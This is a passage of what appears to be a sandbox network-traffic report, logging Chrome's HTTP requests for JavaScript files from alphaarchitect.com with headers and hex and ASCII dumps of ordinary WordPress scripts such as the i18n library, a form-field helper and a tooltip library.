                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-23b5"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de29e1f5f4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC877INData Raw: 32 33 62 35 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 32 30 35 38 3a 28 74 2c 65 2c 72 29 3d 3e 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 7b 6e 6f 74 5f 73 74 72 69 6e 67 3a 2f 5b 5e 73 5d 2f 2c 6e 6f 74 5f 62 6f 6f 6c 3a 2f 5b 5e 74 5d 2f 2c 6e 6f 74 5f 74 79 70 65 3a 2f 5b 5e 54 5d 2f 2c 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 3a 2f 5b 5e 76 5d 2f 2c 6e 75 6d 62 65 72 3a 2f 5b 64 69 65 66 67 5d 2f 2c 6e 75 6d 65 72 69 63 5f 61 72 67 3a 2f 5b 62 63 64 69 65 66 67 75 78 58 5d 2f 2c 6a 73 6f 6e 3a 2f 5b 6a 5d 2f 2c 6e 6f 74 5f 6a 73 6f 6e 3a 2f 5b 5e 6a 5d 2f 2c 74 65 78 74 3a 2f
                                                                                                                                                                                                                                                                        Data Ascii: 23b5/*! This file is auto-generated */(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69 2e 6e 6f 74 5f 70 72 69 6d 69 74 69 76 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 26 26 28 72 3d 72 28 29 29 2c 69 2e 6e 75 6d 65 72 69 63 5f 61 72 67 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 72 26 26 69 73 4e 61 4e 28 72 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 61 28 22 5b 73 70 72 69 6e 74 66 5d 20 65 78 70 65 63 74 69 6e 67 20 6e 75 6d 62 65 72 20 62 75 74 20 66 6f 75 6e 64 20 25 54 22 2c 72 29 29 3b 73 77 69 74 63 68 28 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 28 63 3d 72 3e 3d 30 29 2c 73 2e 74 79 70 65 29 7b 63 61
                                                                                                                                                                                                                                                                        Data Ascii: _type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&isNaN(r))throw new TypeError(a("[sprintf] expecting number but found %T",r));switch(i.number.test(s.type)&&(c=r>=0),s.type){ca
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64 5f 63 68 61 72 2e 63 68 61 72 41 74 28 31 29 3a 22 20 22 2c 70 3d 73 2e 77 69 64 74 68 2d 28 66 2b 72 29 2e 6c 65 6e 67 74 68 2c 6c 3d 73 2e 77 69 64 74 68 26 26 70 3e 30 3f 75 2e 72 65 70 65 61 74 28 70 29 3a 22 22 2c 67 2b 3d 73 2e 61 6c 69 67 6e 3f 66 2b 72 2b 6c 3a 22 30 22 3d 3d 3d 75 3f 66 2b 6c 2b 72 3a 6c 2b 66 2b 72 29 7d 72 65 74 75 72 6e 20 67 7d 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 73 5b 74 5d 29 72 65 74 75 72 6e 20 73 5b 74 5d 3b 76 61 72 20 65 2c 72 3d 74 2c 6e 3d 5b 5d 2c 61 3d 30 3b 66 6f 72 28 3b 72 3b 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 28 65 3d 69 2e 74 65 78 74 2e 65 78 65 63 28 72 29 29 29 6e 2e 70 75 73 68 28 65 5b 30 5d 29 3b 65 6c 73 65 20 69 66 28 6e 75 6c
                                                                                                                                                                                                                                                                        Data Ascii: =s.pad_char?"0":s.pad_char.charAt(1):" ",p=s.width-(f+r).length,l=s.width&&p>0?u.repeat(p):"",g+=s.align?f+r+l:"0"===u?f+l+r:l+f+r)}return g}(function(t){if(s[t])return s[t];var e,r=t,n=[],a=0;for(;r;){if(null!==(e=i.text.exec(r)))n.push(e[0]);else if(nul
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 28 61 2c 61 2e 65 78 70 6f 72 74 73 2c 72 29 2c 61 2e 65 78 70 6f 72 74 73 7d 72 2e 6e 3d 74 3d 3e 7b 76 61 72 20 65 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 72 2e 64 28 65 2c 7b 61 3a 65 7d 29 2c 65 7d 2c 72 2e 64 3d 28 74 2c 65 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 72 2e 6f 28 65 2c 6e 29 26 26 21 72 2e 6f 28 74 2c 6e 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 5b 6e 5d 7d 29 7d 2c 72 2e 6f 3d 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                                                                                                                                                                                                                                        Data Ascii: a=e[n]={exports:{}};return t[n](a,a.exports,r),a.exports}r.n=t=>{var e=t&&t.__esModule?()=>t.default:()=>t;return r.d(e,{a:e}),e},r.d=(t,e)=>{for(var n in e)r.o(e,n)&&!r.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:e[n]})},r.o=(t,e)=>Object.proto
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 2c 74 7d 7d 76 61 72 20 6f 2c 73 2c 6c 2c 75 3b 6f 3d 7b 22 28 22 3a 39 2c 22 21 22 3a 38 2c 22 2a 22 3a 37 2c 22 2f 22 3a 37 2c 22 25 22 3a 37 2c 22 2b 22 3a 36 2c 22 2d 22 3a 36 2c 22 3c 22 3a 35 2c 22 3c 3d 22 3a 35 2c 22 3e 22 3a 35 2c 22 3e 3d 22 3a 35 2c 22 3d 3d 22 3a 34 2c 22 21 3d 22 3a 34 2c 22 26 26 22 3a 33 2c 22 7c 7c 22 3a 32 2c 22 3f 22 3a 31 2c 22 3f 3a 22 3a 31 7d 2c 73 3d 5b 22 28 22 2c 22 3f 22 5d 2c 6c 3d 7b 22 29 22 3a 5b 22 28 22 5d 2c 22 3a 22 3a 5b 22 3f 22 2c 22 3f 3a 22 5d 7d 2c 75 3d 2f 3c 3d 7c 3e 3d 7c 3d 3d 7c 21 3d 7c 26 26 7c 5c 7c 5c 7c 7c 5c 3f 3a 7c 5c 28 7c 21 7c 5c 2a 7c 5c 2f 7c 25 7c 5c 2b 7c 2d 7c 3c 7c 3e 7c 5c 3f 7c 5c 29 7c 3a 2f 3b 76 61
                                                                                                                                                                                                                                                                        Data Ascii: rror: \n\n"+e.toString()),t}}var o,s,l,u;o={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3,"||":2,"?":1,"?:":1},s=["(","?"],l={")":["("],":":["?","?:"]},u=/<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/;va
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 20 69 6e 20 74 68 69 73 2e 64 61 74 61 3d 74 2c 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 3d 7b 7d 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 7b 7d 2c 66 29 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 72 5d 3d 76 6f 69 64 20 30 21 3d 3d 65 26 26 72 20 69 6e 20 65 3f 65 5b 72 5d 3a 66 5b 72 5d 7d 64 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 50 6c 75 72 61 6c 46 6f 72 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 2c 6e 2c 69 2c 61 3d 74 68 69 73 2e 70 6c 75 72 61 6c 46 6f 72 6d 73 5b 74 5d 3b 72 65 74 75 72 6e 20 61 7c 7c 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 28 69 3d 28 72 3d 74 68 69 73 2e 64 61 74 61 5b 74
                                                                                                                                                                                                                                                                        Data Ascii: gKey:null};function d(t,e){var r;for(r in this.data=t,this.pluralForms={},this.options={},f)this.options[r]=void 0!==e&&r in e?e[r]:f[r]}d.prototype.getPluralForm=function(t,e){var r,n,i,a=this.pluralForms[t];return a||("function"!=typeof(i=(r=this.data[t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73 74 20 74 3d 74 3d 3e 7b 67 2e 74 65 73 74 28 74 29 26 26 61 28 29 7d 3b 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 41 64 64 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 2c 72 2e 61 64 64 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 22 63 6f 72 65 2f 69 31 38 6e 22 2c 74 29 7d 72 65 74 75 72 6e 7b 67 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 6e 2e 64 61 74 61 5b 74 5d 2c 73 65 74 4c 6f 63 61 6c 65 44 61 74 61 3a 73 2c 61 64 64 4c 6f 63 61 6c 65 44 61 74 61 3a 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 6e 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 6e 2e 64 61 74 61 5b 65 5d 2c 2e 2e 2e 74 2c 22 22 3a 7b 2e 2e 2e
                                                                                                                                                                                                                                                                        Data Ascii: ;if(t&&s(t,e),r){const t=t=>{g.test(t)&&a()};r.addAction("hookAdded","core/i18n",t),r.addAction("hookRemoved","core/i18n",t)}return{getLocaleData:(t="default")=>n.data[t],setLocaleData:s,addLocaleData:(t,e="default")=>{n.data[e]={...n.data[e],...t,"":{...
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC58INData Raw: 6c 61 74 69 6f 6e 2e 62 69 6e 64 28 62 29 7d 29 28 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 69 31 38 6e 3d 6e 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: lation.bind(b)})(),(window.wp=window.wp||{}).i18n=n})();
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        44192.168.2.449801141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC608OUTGET /wp-content/cache/min/1/wp-content/plugins/wp-quicklatex/js/wp-quicklatex-frontend.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-18b"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de3c860f3f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC402INData Raw: 31 38 62 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 76 61 72 20 74 65 73 74 49 6d 67 3d 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 79 4e 7a 55 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 6a 63 31 49 6a 34 38 4c 33 4e 32 5a 7a 34 25 33 44 27 3b 76 61 72 20 69 6d 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 6d 67 27 29 0a 69 6d 67 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 73 72 63 27 2c 74 65 73 74 49 6d 67 29 3b 69 6d 67 2e 61 64
                                                                                                                                                                                                                                                                        Data Ascii: 18bjQuery(document).ready(function($){var testImg='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNzUiIGhlaWdodD0iMjc1Ij48L3N2Zz4%3D';var img=document.createElement('img')img.setAttribute('src',testImg);img.ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        45192.168.2.449803141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC615OUTGET /wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC444INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-ae"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147807
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de3dbe4372-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC180INData Raw: 61 65 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 24 28 22 2e 64 69 73 61 62 6c 65 64 20 69 6e 70 75 74 2c 20 2e 64 69 73 61 62 6c 65 64 20 74 65 78 74 61 72 65 61 22 29 2e 70 72 6f 70 28 27 64 69 73 61 62 6c 65 64 27 2c 27 64 69 73 61 62 6c 65 64 27 29 3b 24 28 22 2e 72 65 61 64 6f 6e 6c 79 20 69 6e 70 75 74 2c 20 2e 72 65 61 64 6f 6e 6c 79 20 74 65 78 74 61 72 65 61 22 29 2e 70 72 6f 70 28 27 72 65 61 64 6f 6e 6c 79 27 2c 27 72 65 61 64 6f 6e 6c 79 27 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: aejQuery(document).ready(function($){$(".disabled input, .disabled textarea").prop('disabled','disabled');$(".readonly input, .readonly textarea").prop('readonly','readonly')})
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        46192.168.2.449798141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:49 UTC799OUTGET /wp-content/plugins/ultimate-member/assets/libs/tipsy/tipsy.min.js?ver=1.0.0a HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-110e"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 87653
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9de3f7d8c27-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC878INData Raw: 31 31 30 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 74 2e 63 61 6c 6c 28 65 29 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 61 28 74 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 65 2c 74 68 69 73 2e 65 6e 61 62 6c 65 64 3d 21 30 2c 74 68 69 73 2e 66 69 78 54 69 74 6c 65 28 29 7d 68 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 73 68 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 67 65 74 54 69 74 6c 65 28 29 3b 69 66 28 74 26 26 74 68 69 73 2e 65 6e 61 62 6c 65 64 29 7b 76 61 72 20 65 2c 69 3d 74 68 69 73 2e 74 69 70 28 29 2c 73 3d 28 69 2e 66 69 6e 64
                                                                                                                                                                                                                                                                        Data Ascii: 110e!function(a){function l(t,e){return"function"==typeof t?t.call(e):t}function h(t,e){this.$element=a(t),this.options=e,this.enabled=!0,this.fixTitle()}h.prototype={show:function(){var t=this.getTitle();if(t&&this.enabled){var e,i=this.tip(),s=(i.find
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 22 3a 28 65 78 74 72 61 5f 67 61 70 3d 30 29 3c 61 28 22 62 6f 64 79 22 29 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 29 2e 6c 65 6e 67 74 68 26 26 22 72 65 6c 61 74 69 76 65 22 3d 3d 61 28 22 62 6f 64 79 22 29 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 29 26 26 61 28 22 23 77 70 61 64 6d 69 6e 62 61 72 22 29 2e 6c 65 6e 67 74 68 26 26 28 65 78 74 72 61 5f 67 61 70 3d 61 28 22 23 77 70 61 64 6d 69 6e 62 61 72 22 29 2e 68 65 69 67 68 74 28 29 29 2c 65 3d 7b 74 6f 70 3a 73 2e 74 6f 70 2b 73 2e 68 65 69 67 68 74 2f 32 2d 6f 2f 32 2d 65 78 74 72 61 5f 67 61 70 2c 6c 65 66 74 3a 73 2e 6c 65 66 74 2b 73 2e 77 69 64 74 68 2b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 7d 7d 32 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 28 22 77 22 3d 3d 74 2e 63 68 61
                                                                                                                                                                                                                                                                        Data Ascii: ":(extra_gap=0)<a("body").css("position").length&&"relative"==a("body").css("position")&&a("#wpadminbar").length&&(extra_gap=a("#wpadminbar").height()),e={top:s.top+s.height/2-o/2-extra_gap,left:s.left+s.width+this.options.offset}}2==t.length&&("w"==t.cha
                                                                                                                                                                                                                                                                        2024-12-20 12:44:50 UTC1369INData Raw: 72 22 3e 3c 2f 64 69 76 3e 27 29 2c 74 68 69 73 2e 24 74 69 70 2e 64 61 74 61 28 22 74 69 70 73 79 2d 70 6f 69 6e 74 65 65 22 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 29 29 2c 74 68 69 73 2e 24 74 69 70 7d 2c 76 61 6c 69 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 28 74 68 69 73 2e 68 69 64 65 28 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 6e 75 6c 6c 29 7d 2c 65 6e 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 64 3d 21 30 7d 2c 64 69 73 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 6e 61 62 6c 65 64 3d 21 31 7d 2c 74 6f 67 67 6c 65 45 6e 61 62
                                                                                                                                                                                                                                                                        Data Ascii: r"></div>'),this.$tip.data("tipsy-pointee",this.$element[0])),this.$tip},validate:function(){this.$element[0].parentNode||(this.hide(),this.$element=null,this.options=null)},enable:function(){this.enabled=!0},disable:function(){this.enabled=!1},toggleEnab
